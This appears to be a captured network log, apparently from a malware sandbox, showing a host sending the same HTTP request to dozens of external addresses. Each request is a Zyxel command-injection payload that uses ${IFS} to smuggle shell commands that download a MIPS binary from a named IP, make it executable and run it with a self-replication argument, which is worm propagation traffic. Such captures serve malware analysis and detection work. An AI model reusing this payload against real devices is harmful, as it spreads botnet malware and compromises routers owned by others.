                                                        Jan 28, 2024 10:12:56.475055933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5423192.168.2.1454972208.153.132.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475092888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5424192.168.2.1443254148.161.192.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475194931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5425192.168.2.1449174122.249.121.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475235939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5426192.168.2.143439237.198.204.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475261927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5427192.168.2.145064851.14.186.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475263119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5428192.168.2.144218249.246.205.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475274086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5429192.168.2.1448064218.123.187.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475305080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5430192.168.2.1457666143.129.108.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475317955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5431192.168.2.1439872186.45.216.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475327969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5432192.168.2.14482642.225.222.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475388050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5433192.168.2.145266094.10.24.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475400925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5434192.168.2.144681486.255.15.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475435019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5435192.168.2.1450166156.0.234.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475480080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5436192.168.2.145298420.123.31.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475513935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5437192.168.2.1444954124.108.77.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475569010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5438192.168.2.144003835.222.76.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475577116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5439192.168.2.145883225.2.217.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475620031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5440192.168.2.14403348.234.83.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475646019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5441192.168.2.1450132182.67.248.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475704908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5442192.168.2.144398283.20.76.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475732088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5443192.168.2.1451796162.50.113.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475765944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5444192.168.2.144214690.127.234.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475795984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5445192.168.2.1449720202.205.231.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475846052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5446192.168.2.14333261.52.201.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475881100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5447192.168.2.1442510161.134.30.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475922108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5448192.168.2.1434902111.128.47.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475946903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5449192.168.2.1453426173.146.1.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.475985050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5450192.168.2.145412883.15.176.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476036072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5451192.168.2.1459658180.39.255.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476061106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5452192.168.2.143658273.138.194.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476099968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5453192.168.2.143873218.96.198.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476135969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5454192.168.2.1454896172.223.234.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476162910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5455192.168.2.1444072137.246.25.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476236105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5456192.168.2.145659875.251.199.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476279020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5457192.168.2.1449532102.187.200.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476316929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5458192.168.2.145520880.61.91.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476341009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5459192.168.2.1442026141.246.21.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476403952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5460192.168.2.143681264.49.247.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476418018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5461192.168.2.1458632172.64.173.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476464033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5462192.168.2.143617858.162.223.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476502895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5463192.168.2.1447014163.170.227.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476531029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5464192.168.2.144092099.171.148.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476566076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5465192.168.2.144262489.45.39.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476591110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5466192.168.2.14510928.204.38.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476650953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5467192.168.2.145859864.28.181.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476669073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5468192.168.2.143427232.74.134.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476700068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5469192.168.2.143382048.37.36.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476731062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5470192.168.2.1439518181.60.118.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476772070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5471192.168.2.145139474.153.106.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476814985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5472192.168.2.1457350131.209.247.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476866961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5473192.168.2.144719093.101.103.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:56.476907015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5474192.168.2.144545294.232.135.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488611937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5475192.168.2.1452596199.126.103.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488648891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5476192.168.2.1447072169.74.163.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488683939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5477192.168.2.1433120111.29.177.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488723040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5478192.168.2.1441476149.202.116.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488765001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5479192.168.2.1452752207.101.142.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488811016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5480192.168.2.1437888153.63.40.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488862038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5481192.168.2.1459026152.248.173.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488899946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5482192.168.2.1456346208.154.20.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.488954067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5483192.168.2.145187283.124.141.25443
                                                        TimestampBytes transferredDirectionData
